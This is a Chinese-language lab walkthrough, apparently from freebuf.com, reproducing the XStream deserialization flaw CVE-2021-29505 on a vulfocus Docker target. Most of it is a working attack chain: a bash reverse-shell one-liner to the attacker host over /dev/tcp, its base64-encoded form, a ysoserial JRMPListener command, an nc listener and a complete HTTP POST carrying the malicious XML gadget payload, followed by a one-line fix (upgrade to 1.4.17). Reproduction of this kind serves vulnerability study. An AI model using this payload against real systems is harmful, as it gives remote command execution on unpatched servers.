0x00 简介
XStream是一个常用的Java对象和XML相互转换的工具,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,大大简化了XML序列化工作。
0x01 漏洞概述
XStream官方发布安全更新,修复了多个XStream 反序列化漏洞,其中就包含了CVE-2021-29505。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2021-29505反序列化代码执行漏洞等。漏洞复杂度低,危害程度高,实际漏洞利用依赖于具体代码实现以及相关接口请求,无法批量远程利用。
0x02 影响版本
XStream <= 1.4.16
0x03 环境搭建
1.安装虚拟机应用程序(本次测试使用的是VMware Workstation Pro16.1版本)
2.安装受漏洞影响的版本的Windows系统,本次测试使用的操作系统环境如下:
Linuxshitday4.15.0-142-generic#146~16.04.1-Ubuntu SMP Tue Apr 13 09:27:15 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
以上软件获取和安装可自行上网搜索相关教程
3.使用docker搜索和下载镜像
sudodocker search xstream
sudodocker pull vulfocus/xstream-cve_2021_29505
查看已有docker镜像
sudodocker images
0x04 漏洞复现
1.启动docker镜像
sudodocker run -p8080:8080 -t-dxstream-cve_2021_29505
2.分别查看靶机IP为 192.168.50.129,攻击机IP为192.168.50.130
3.访问 xstream 服务
出现如上页面则环境启动成功
4.下载反序列化工具
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
5.根据自己的攻击机IP和自定义端口修改以下反弹shell的语句
/bin/bash -i>& /dev/tcp/192.168.50.130/4444 0>&1
6.对上一条语句进行base64编码
importbase64
base64.b64encode(b"/bin/bash -i >& /dev/tcp/192.168.50.130/4444 0>&1")
7.攻击机执行以下语句来监听端口
java -cpysoserial.jar ysoserial.exploit.JRMPListener 4444CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTAuMTMwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"
8.另起一个命令行进行反弹回来的shell的监听
nc-lvp5555
9.打开BurpSuite,根据自己攻击机IP和端口进行修改后,使用以下payload对靶机进行发包
POST / HTTP/1.1
Host: 192.168.50.129:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 1675
<java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> <parsedMessage>true</parsedMessage> <soapVersion>SOAP_11</soapVersion> <bodyParts/> <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> <attachmentsInitialized>false</attachmentsInitialized> <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> <names> <string>aa</string> <string>aa</string> </names> <ctx> <environment/> <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> <java.rmi.server.RemoteObject> <string>UnicastRef</string> <string>192.168.50.130</string> <int>4444</int> <long>0</long> <int>0</int> <long>0</long> <short>0</short> <boolean>false</boolean> </java.rmi.server.RemoteObject> </registry> <host>192.168.50.130</host> <port>4444</port> </ctx> </candidates> </aliases> </nullIter> </sm> </message> </value> </javax.naming.ldap.Rdn_-RdnEntry> </java.util.PriorityQueue> </java.util.PriorityQueue>
10.BP发包后可以看到成功反弹一个shell,可以判断是靶机上开启的容器的shell,可以执行任意命令
0x05 修复建议
升级xstream到1.4.17或以上版本
来源:freebuf.com 2021-07-29 11:54:40 by: 17608406504
请登录后发表评论
注册